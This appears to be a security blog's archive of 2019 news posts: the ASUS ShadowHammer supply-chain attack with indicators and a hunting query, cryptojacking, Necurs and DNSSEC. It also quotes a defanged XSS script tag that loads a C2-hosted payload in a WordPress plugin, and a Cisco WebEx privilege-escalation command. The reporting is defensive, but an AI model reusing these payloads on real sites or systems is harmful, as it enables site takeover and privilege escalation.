A Compromised the ASUS update infrastructure through auto-update software is causing a supply chain attack

Executive summary

The software supply chain continues to be a popular channel for launching attacks. Publicly available reports indicate that attackers have reached a large number of devices through auto-update software provided with computers from Taiwanese manufacturer ASUS. In a campaign dubbed “Operation ShadowHammer”, attackers have compromised the ASUS update infrastructure to deliver backdoored versions of the Asus Live Update app, which comes preinstalled on ASUS computers.

Microsoft is actively investigating available reports as well as malware samples and telemetry. We have consolidated detections of malicious binaries involved in this attack under the name ShadowHammer.

ASUS has indicated that they have replaced the backdoored version of their updater and implemented enhancements to their infrastructure. Microsoft continues to investigate this threat and will provide updates as we get more information.

ASUS has also implemented a fix in the latest version (ver. 3.6.8) of the Live Update software, introduced multiple security verification mechanisms to prevent any malicious manipulation in the form of software updates or other means, and implemented an enhanced end-to-end encryption mechanism. At the same time, we have also updated and strengthened our server-to-end-user software architecture to prevent similar attacks from happening in the future.
Additionally, we have created an online security diagnostic tool to check for affected systems, and we encourage users who are still concerned to run it as a precaution. The tool can be found here: https://dlcdnets.asus.com/pub/ASUS/nb/Apps_for_Win10/ASUSDiagnosticTool/ASDT_v1.0.1.0.zip
Users who have any additional concerns are welcome to contact ASUS Customer Service.

More information about APT groups: https://www.fireeye.com/current-threats/apt-groups.html

How do I know whether or not my device has been targeted by the malware attack?

What should I do if my device is affected?

How do I make sure that I have the latest version of ASUS Live Update?

https://www.asus.com/support/FAQ/1018727/

Have other ASUS devices been affected by the malware attack?

Analysis

Our ShadowHammer detections center around variants of the backdoored Asus Live Update app representing at least two generations of attack code. These generations are marked by samples with shellcode that are either in plaintext or encrypted. Also, the appearance of these updater variants corresponds to the validity dates of the certificates used to sign them.

The backdoored updaters might have been designed to target specific computers. They contain hardcoded MD5 hashes representing MAC addresses. They appear to use these hashes to identify targets and determine whether to deploy additional payloads.

Mitigations

Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.

Turn on cloud-delivered protection and automatic sample submission on Windows Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
Utilize the Windows Defender Firewall and your network firewall to prevent RPC and SMB communication among endpoints whenever possible. This limits lateral movement as well as other attack activities.
Secure internet-facing RDP services behind a multi-factor authentication (MFA) gateway. If you don't have an MFA gateway, enable network-level authentication (NLA) and ensure that server machines have strong, randomized local admin passwords.
Customers that have not installed the ASUS Live Update app are not affected by the known attack method. Customers can either uninstall this app or get the latest version. According to Asus, version 3.6.8 includes a fix and additional mechanisms that can prevent manipulation of updates.
Utilize Microsoft Edge or other web browsers that support SmartScreen. SmartScreen has removed reputation information for the certificates abused during these attacks. Binaries signed with those certificates will trigger a warning about an “unrecognized app”.

Detection details

Windows Defender Antivirus

Windows Defender Antivirus detects trojanized apps and backdoor implants as the following malware:

Endpoint detection and response (EDR)

Alerts with the following titles in the Windows Defender Security Center portal can indicate threat activity on your network:

Malicious binaries associated with a supply chain attack
Network traffic to domains associated with a supply chain attack

Advanced hunting

Publicly available reports indicate that this attack took place from June to November 2018, so some customers might only have telemetry around this period. To locate related attack activity in the past 30 days, run the following query:

//Event types that may be associated with the implant or container

union ProcessCreationEvents, NetworkCommunicationEvents, FileCreationEvents, ImageLoadEvents

| where EventTime > ago(30d)

//File SHAs for implant and container

| where InitiatingProcessSHA256 in("e01c1047001206c52c87b8197d772db2a1d3b7b4",

"e005c58331eb7db04782fdf9089111979ce1406f", "69c08086c164e58a6d0398b0ffdcb957930b4cf2")

//Download domain

NetworkCommunicationEvents

| where EventTime > ago(30d)

| where RemoteUrl == "asushotfix.com" or RemoteIP == "141.105.71.116"

The provided query checks events from the past 30 days. Change EventTime to focus on a different period.

Indicators

Files (SHA-1)

2c591802d8741d6aef1a278b9aca06952f035b8f
e01c1047001206c52c87b8197d772db2a1d3b7b4
5039ff974a81caf331e24eea0f2b33579b00d854
9f0dbf2ba3b237ff5fd4213b65795595c513e8fa
e793c89ecf7ee1207e79421e137280ae1b377171
e005c58331eb7db04782fdf9089111979ce1406f
4a8d9a9ca776aaaefd7f6b3ab385dbcfcbf2dfff
fdc7169d7e0a421dfb37ab2a9ecae9c9d5b4b8b2

Malware download URL

hxxp://asushotfix.com

URLs with compromised packages

hxxp://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip
hxxps://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip
hxxps://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip
hxxps://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip

Abused certificates

ASUSTeK Computer Inc.

Status: This certificate has expired and is no longer valid.

Issuer DigiCert SHA2 Assured ID Code Signing CA

Valid from 12:00 AM 07/27/2015

Valid to 12:00 PM 08/01/2018

Valid usage Code Signing

Algorithm sha256RSA

Thumbprint 29935023FF1386F5F0A0355B778B0DFF2022E196

Serial number 0F F0 67 D8 01 F7 DA EE AE 84 2E 9F E5 F6 10 EA

ASUSTeK Computer Inc.

Status: Valid

Issuer DigiCert SHA2 Assured ID Code Signing CA

Valid from 12:00 AM 06/20/2018

Valid to 12:00 PM 06/22/2021

Valid usage Code Signing

Algorithm sha256RSA

Thumbprint 626646D29C5B0E7C53AA84698A4A97BE323CF17F

Serial number 05 E6 A0 BE 5A C3 59 C7 FF 11 F4 B4 67 AB 20 FC

References

Operation ShadowHammer. Kaspersky (accessed 2019-03-25)
ShadowHammer: Malicious updates for ASUS laptops. Kaspersky (accessed 2019-03-25)
Hackers Hijacked ASUS Software Updates to Install Backdoors on Thousands of Computers. Motherboard (accessed 2019-03-25)
ASUS response to the recent media reports regarding ASUS Live Update tool attack by Advanced Persistent Threat (APT) groups. ASUS (accessed 2019-03-26)

Sites to check if your device has been targeted

https://shadowhammer.kaspersky.com/

Thanks to various sources for this information including ASUS, Fireeye, and Susan E Bradley

Fri, 29 Mar 2019 13:32:00 +0000

Metadata remnants patched on Google Photos

   A bug was discovered this week in Google Photos, where all photos in a users Google Photo account could have their metadata easily read and collected. Bad actors would target a particular query, for example, a location, and then measure the time it takes for the website to respond. Even though the response might be an access denied, there is value in knowing it’s presence or not. It is possible to confirm or deny the presence of particular tags in the photo when using this cross site search method of attack.

    Location is probably one of the more dangerous pieces of information that can be leaked using this attack as it is possible to build a timeline of the victim’s travels and location using consecutive searches. In the original report of this issue, the researcher was able to divine the approximate date and time of a visit to another country using a malicious website by interacting with a logged in google photos account.

    While this attack doesn’t give any access to the photos themselves, or anything other than whether or not the specified terms/queries exist, the benefits can be extrapolated out to schedules and can allow for more finely crafted malvertisements or phishing attempts. One could imagine a malware ridden site harvesting emails, gaining access to location information, and then sending malicious emails being sent concerning issues with travel expenses to a location which is lent more credence by the fact that our victim has traveled to the given location within the time frame that the email is sent.

   While this exploit in particular has been patched, there are countless other browser side attacks that can be exploited, and safeguarding your data is paramount. This attack shows how a clever adversary can wield information no matter how small the leakage. Tools are available for content control to prevent data leakage. Tools such as PuriFile can help you manage metadata, scrub documents of sensitive terms and information, and even help detect data that may be obfuscated.

Sources:
• https://www.zdnet.com/article/google-photos-vulnerability-could-have-let-hackers-retrieve-image-metadata/

• https://www.imperva.com/blog/now-patched-google-photos-vulnerabilitylet-hackers-track-your-friends-and-location-history/

Thanks to Peraton for this information
Sat, 23 Mar 2019 17:39:00 +0000

ELDERLY FRAUD AND ABUSE IN AMERICA RESOURCES

Please share important information this with those who you know.

United States Attorney William P. Barr recently stated that crimes against the elderly target some of the most vulnerable people in our society. Because of their stage in life, they don't have the opportunity frequently to recover, and the losses are devastating to them.

Whether as the result of isolation, diminished cognition, financial insecurity, trusting too much, being ashamed to report being scammed or concerned about how relatives will react, serious concern for health or other causes, many of these crimes go unreported.

Information on The Federal Bureau of Investigation Site

https://www.fbi.gov/scams-and-safety/common-fraud-schemes/seniors

Information on The Department of Justice Site

The video below discusses scams and identity theft, looks at trends and gives tips and tools with a focus on the Federal Trade Commission's Pass It On Campaign:

https://www.justice.gov/elderjustice/video.introducing-ftc-s-scams-and-identity-theft-older-adults-trends-tips-and-tools

Extent of elder abuse, causes and characteristics, addressing mistreatment, financial exploration and perpetrators:

https://www.nij.gov/topics/crime/elder-abuse/pages/welcome.aspx

Abuse by caregivers, domestic violence, fraud and financial abuse, training resources and tools, and additional information and resources: https://www.ncjrs.gov/elderabuse/

Contains prosecutor video series, federal financial exploitation resources, rural and tribal resources, multidisciplinary guide and toolkit, webinars for elder abuse professionals, elder abuse statutes and elder justice resources by state: https://justice.gov/elderlyjustice

Information on The Better Business Bureau Site

https://bbb.org.scamtracker/US

The BBB tracks reported scams throughout the U.S.

If you become aware of elder fraud and/or abuse, you are right to be concerned. If you SEE SOMETHING, please SAY SOMETHING in a timely manner to law enforcement, security and/or your supervisor, and give the authorities the chance to make a difference.

Sat, 23 Mar 2019 17:35:00 +0000

The Virtual Security Summit by Microsoft

This free event has lots of good content the session are listed below. the event is Streaming Live April 16 , 9-12 noon PT.
To register go here

Session	Featured Speakers
Securing emerging technologies Learn about the new trends that will affect cybersecurity into the future of Internet of Things and Machine Learning, and learn how to maintain your organization’s resiliency throughout innovations in cybersecurity.	Sian John Chief Security Advisor, Microsoft EMEA Hafid Elabdellaoui Chief Security Advisor, Microsoft
Evolution of cyberthreats: Customer conversation identity and threat Join this discussion on the evolution of cyberthreats and the latest thinking on identity and threat protection tactics.	Joram Borenstein General Manager, Cybersecurity Solutions Group, Microsoft Kostas Georgakopoulos Chief Information Security Officer, Procter & Gamble
The importance of security frameworks CIS, NIST and others Fraud Detection as a Service (FDaaS) is helping government customers detect and prevent improper payments. Learn how your agency can save significant staff resources and ensure proper distribution of funds.	Curtis W. Dukes Executive Vice President and General Manager Security Best Practices and Automation Group, CIS Sean Sweeney Americas Director, Cybersecurity Solutions Group, Microsoft

Fri, 15 Mar 2019 20:29:00 +0000

Threat of Cryptojacking Still an Issue

In November of 2018 Forbes ran an article about the increase of cryptojacking. At the time the Cyber Threat Alliance (CTA) was indicating a 629% increase of infections in just the short time between Q1 to Q2 of 2018. Threats had grown from an estimated 400,000 (Q4 2017) infections to 2.5 million infected machines in Q2 of 2018. 2019 is still showing growth in cryptojacking threats.

The number of tools available to bad actors has grown. For example the Russian threat, WebCobra, that McAfee Labs researchers found, was able to drop one of two different payloads based on architecture it detected on the infected machine.

The threats are continuing to become more sophisticated as well. 360 Total Security researchers have released the details of the newer PsMiner malware. Designed to exploit known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, Weblogic, ThinkPHP, and SqlServer to spread from server to server to mine for Monero.

The worm uses a file called Systemctl.exe written in the Go language to bundle then download the exploit modules and to attack Windows servers. In addition to the exploits, PsMiner has the ability to brute force its way in to a system. When it detects weak or default credentials, it can utilize a brute force password cracking component.

Once it PsMiner has access to a system, it then uses a PowerShell command to download a WindowsUpdate.ps1 with a malicious payload and master module that will drop the Monero miner on the system. The malware then copies itself into the temp directory and create a scheduled task called “Update service for Windows Service” that will run once every 10 minutes to prolong and refresh the infection. Using the XMRig CPU miner and a custom mining profile while using Living-off-the-Land (LotL) techniques, the worm can persist for some time.

This also shows a level of sophistication to which the bad actors have access. Another example of this type of attack sticking around is the eight Microsoft Store apps found dropping cryptojacking malware on systems: Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.

These Apps have been since removed from the Microsoft store, but show a troubling pattern of predatory behavior. Estimates are indicating that there have been ten times more organizations affected by cryptojacking than ransomware just last year. It is clear that cryptojacking is still a threat to consider in 2019.

Sources
• https://www.bleepingcomputer.com/news/security/malware-spreads-as-a -worm-uses-cryptojacking-module-to-mine-for-monero/

• https://www.forbes.com/sites/rachelwolfson/2018/11/13/cryptojackingon-the-rise-webcobra-malware-uses-victims-computers-to-minecryptocurrency/#20183346c336

• https://blog.malwarebytes.com/cybercrime/2018/02/state-maliciouscryptomining/
Fri, 15 Mar 2019 20:18:00 +0000

Abandoned Cart plugin for WordPress sites exploit.

    Online shopping has the convenience of collecting items and dispensing personal judgement on the things you like and the things you don’t. All this without having the effort of hauling those things around a labyrinth of smells and sounds! And with the Abandoned Cart plugin for WordPress sites, the site administrator can hold on to your cart in case you have a desire to pick up where you left off if a sudden pressing matter arises, or you simply lose interest for the time being. But WordFence security researchers have noticed a flaw in the execution of the Abandoned Cart plugin which enables a complete site takeover along with laying a secondary backdoor to regain access in case of discovery.

    The Abandoned Cart plugin had a distinct lack of sanitation on the input and output of fields used when a user begins checking out. The billing_first_name and billing_last_name data fields are stored as entered. The two fields are then displayed concatenated in a customer field when the administrator logs in to view their dashboard. The attack creates random first and last names and random email addresses to be acceptable form entries, but enters both the first and the last name as the billing_first_name entry and “<script src=hXXps://bit[.]ly/2SzpVBY></script>“ as the billing_last_name field. The URL points to a Command control server, “hXXps://cdn-bigcommerce[.]com/ visionstat.js” which contains a malicious JavaScript payload.

    The attacker first uses the victim’s browser session to make trusted actions on the WordPress website using hidden iframes, acting while the user is unaware of the invasion occurring. The first action taken is creating an administrative user for the site to which the attacker has the credentials. Who needs a backdoor, when you create keys to the front door for yourself? The user to these clandestine accounts has consistently been found to be “woouser” with a “woouser” email at mailinator, a free disposable email. The malicious JavaScript then infects an inactive plugin with a malicious script that still listens for commands from the C2 server. The script can execute arbitrary PHP code on the compromised server. Both infiltration processes report the infected website’s URL to the C2 server and a confirmation email is sent to the mailinator address to confirm the administrator account.

    A patch for this vulnerability was released, which uses WordPress’ own data sanitizer to exclude names beginning with “<“ and any account with “woouser” in the email. While this prevents the initial attack from creating adversary controlled accounts, it doesn't address the code injection in the deactivated plugins.

Sources:
https://www.wordfence.com/blog/2019/03/xss-flaw-in-abandoned-cartplugin-leads-to-wordpress-site-takeovers/

https:// nakedsecurity.sophos.com/2019/03/13/update-now-wordpress-abandoned-cartplugin-under-attack/Cryptojacking
Fri, 15 Mar 2019 20:15:00 +0000

New Elevation of Privilege Vulnerability in Cisco Webex

     A new elevation of privilege vulnerability has been discovered in the Cisco WebEx Meetings desktop app for Windows® by security researcher Marcos Accossatto from SecureAuth Exploits’ Writers Team.

     This vulnerability, tracked as CVE-2019-1674, is an OS Command Injection that can be used to bypass new controls that Cisco put in place after patching a previously disclosed DLL hijacking issue in 2018. This vulnerability could allow a local attacker to elevate their privileges by invoking the update service command. An attacker could exploit this flaw by swapping out the Cisco WebEx Meetings update binary with “a previous vulnerable version through a fake update… that will load a malicious DLL.” The researchers also noted that while this vulnerability can only be exploited locally, it could be exploited remotely in an Active Directory setup through operating system remote management tools.

    The update service for Cisco WebEx Meetings uses XML to check against new files when installing an update. However, this vulnerability would fail to validate version numbers of new files. This is how attackers could potentially insert different files into the update service and trick the update service into “updating” the program to an older, insecure version of Cisco WebEx Meetings. According to SecureAuth, “The vulnerability can be exploited by copying to a local attacker controller folder, the ptUpdate.exe binary. Also, a malicious dll must be placed in the same folder, named wbxtrace.dll. To gain privileges, the attacker must start the service with the command line: sc start webexservice install software-update 1 ‘attacker-controlled-path’ (if the parameter 1 doesn't work, then 2 should be used).” The research team also released a two-step Proof of Concept showing how this vulnerability can be exploited.

     The timeline for this vulnerability is about 2 months long and is as follows: on Dec. 4, 2018, SecureAuth sent the initial notification to Cisco PSIRT. On Dec. 5, 2018, Cisco confirmed they received the advisory and opened a case for it, and on Dec. 7, 2018, Cisco confirmed that they were able to reproduce the vulnerability and began working on a plan to fix it. On Dec. 10, 2018, Cisco told SecureAuth that the fix for the vulnerability would be generally available by the end of February. After a couple of attempts by SecureAuth to get updates on the status of the patch for the vulnerability, Cisco, on Jan. 22, 2019, said they were still aiming for an end of February release. Finally, on Feb. 11, 2019, Cisco confirmed that Feb. 27, 2019 would be the official disclosure date, and have now disclosed a patch for this security vulnerability.

    If your company uses Cisco WebEx Meetings desktop app on Windows, be sure to update it immediately to avoid any potential attacks due to this vulnerability.
Sources:
• https://www.bleepingcomputer.com/news/security/new-elevation-ofprivilege-vulnerability-found-in-cisco-webex-meetings/
• https://securityaffairs.co/wordpress/81751/security/cisco-webex-elevation-privilege.html
• https://www.secureauth.com/labs/advisories/cisco-webex-meetingselevation-privilege-vulnerability
Fri, 01 Mar 2019 18:27:00 +0000

CenturyLink Announces New Threat Research on Necurs

"Necurs is the multitool of botnets, evolving from operating as a spam botnet delivering banking trojans and ransomware to developing a proxy service, as well as cryptomining and DDoS capabilities," said Mike Benjamin, head of Black Lotus Labs. "What's particularly interesting is Necurs' regular cadence of going dark to avoid detection, reemerging to send new commands to infected hosts and then going dark again. This technique is one of many the reasons Necurs has been able to expand to more than half a million bots around the world."

Key Takeaways

Beginning in May of 2018, Black Lotus Labs observed regular, sustained downtime of roughly two weeks, followed by roughly three weeks of activity for the three most active groups of bots comprising Necurs.
Necurs' roughly 570,000 bots are distributed globally, with about half located in the following countries, in order of prevalence: India, Indonesia, Vietnam, Turkey and Iran.
Necurs uses a domain generation algorithm (DGA) to obfuscate its operations and avoid takedown. However, DGA is a double-edged sword: because the DGA domains Necurs will use are known in advance, security researchers can use methods like sinkholing DGA domains and analyzing DNS and network traffic to enumerate bots and command and control (C2) infrastructure.
CenturyLink took steps to mitigate the risk of Necurs to customers, in addition to notifying other network owners of potentially infected devices to help protect the internet.

Additional Resources

Discover how TheMoon has evolved into a proxy as a service: http://news.centurylink.com/2019-01-31-TheMoon-Illustrates-Evolving-Threat-of-IoT-Botnets.
Learn more about Mylobot's second stage attack: http://news.centurylink.com/2018-11-14-Mylobot-botnet-delivers-one-two-punch-with-Khalesi-malware.
Find out how the Satori botnet is resurfacing with new targets: http://news.centurylink.com/2018-10-29-Satori-botnet-resurfaces-with-new-targets.

SOURCE CenturyLink, Inc.

Thu, 28 Feb 2019 14:13:00 +0000

ICANN urges adopting DNSSEC now

With DNS server being attacked all over the world, The Internet Corporation for Assigned Names and Numbers (ICANN) believes that there is an ongoing and significant risk to key parts of the Domain Name System (DNS) infrastructure.

In the context of increasing reports of malicious activity targeting the DNS infrastructure, ICANN is calling for full deployment of the Domain Name System Security Extensions (DNSSEC) across all unsecured domain names. The organization also reaffirms its commitment to engage in collaborative efforts to ensure the security, stability and resiliency of the Internet’s global identifier systems.

As one of many entities engaged in the decentralized management of the Internet, ICANN is specifically responsible for coordinating the top-most level of the DNS to ensure its stable and secure operation and universal resolvability.

On 15 February 2019, in response to reports of attacks against key parts of the DNS infrastructure, ICANN offered a checklist of recommended security precautions for members of the domain name industry, registries, registrars, resellers, and related others, to proactively take to protect their systems, their customers’ systems and information reachable via the DNS.

Public reports indicate that there is a pattern of multifaceted attacks utilizing different methodologies. Some of the attacks target the DNS, in which unauthorized changes to the delegation structure of domain names are made, replacing the addresses of intended servers with addresses of machines controlled by the attackers. This particular type of attack, which targets the DNS, only works when DNSSEC is not in use. DNSSEC is a technology developed to protect against such changes by digitally 'signing' data to assure its validity. Although DNSSEC cannot solve all forms of attack against the DNS, when it is used, unauthorized modification to DNS information can be detected, and users are blocked from being misdirected.

ICANN has long recognized the importance of DNSSEC and is calling for full deployment of the technology across all domains. Although this will not solve the security problems of the Internet, it aims to assure that Internet users reach their desired online destination by helping to prevent so-called “man in the middle” attacks where a user is unknowingly re-directed to a potentially malicious site. DNSSEC complements other technologies, such as Transport Layer Security (most typically used in HTTPS) that protect the end user/domain communication.

As the coordinator of the top-most level of the DNS, ICANN is in the position to help mitigate and detect DNS-related risks, and to facilitate key discussions together with its partners. The organization believes that all members of the domain name system ecosystem must work together to produce better tools and policies to secure the DNS and other critical operations of the Internet. To facilitate these efforts, ICANN is planning an event for the Internet community to address DNS protection: The first is an open session during the upcoming ICANN64 public meeting on 9-14 March 2019, in Kobe, Japan.

As we learn more information, updates may be provided. For information about ICANN64, visit https://meetings.icann.org/kobe64.

This article was a repost off of the ICANN site as a important security notice to all who use or have DNS servers.

Tue, 26 Feb 2019 16:19:00 +0000

617 million accounts stolen

According to the Register.co.uk 617million accounts stolen from 16 hacked websites now for sale on dark web, seller boasts.

Some 617 million online account details stolen from 16 hacked websites are on sale from today on the dark web, according to the data trove's seller.

For less than $20,000 in Bitcoin, it is claimed, the following pilfered account databases can be purchased from the Dream Market cyber-souk, located in the Tor network:
Dubsmash (162 million),
MyFitnessPal (151 million),
MyHeritage (92 million),
ShareThis (41 million),
HauteLook (28 million),
Animoto (25 million),
EyeEm (22 million),
8fit (20 million),
Whitepages (18 million),
Fotolog (16 million),
500px (15 million),
Armor Games (11 million),
BookMate (8 million),
CoffeeMeetsBagel (6 million),
Artsy (1 million), and
DataCamp (700,000).

The hacker told The Register that his goal in putting up the stolen accounts was to ‘make life easier for hackers’. He plans to sell the information to anyone who promises to keep the data secret. This attacker has been hacking accounts since 2012 and information on at least 20 databases.
Further, the hacker stated:

“I don’t think I am deeply evil. I need the money”
“Security is just an illusion. I started hacking a long time ago. I’m just a tool used by the system. We all know measures are taken to prevent cyber attacks, but with these upcoming dumps, I’ll make hacking easier than ever.”

To read the full article go here

Sat, 23 Feb 2019 17:32:00 +0000

BLOG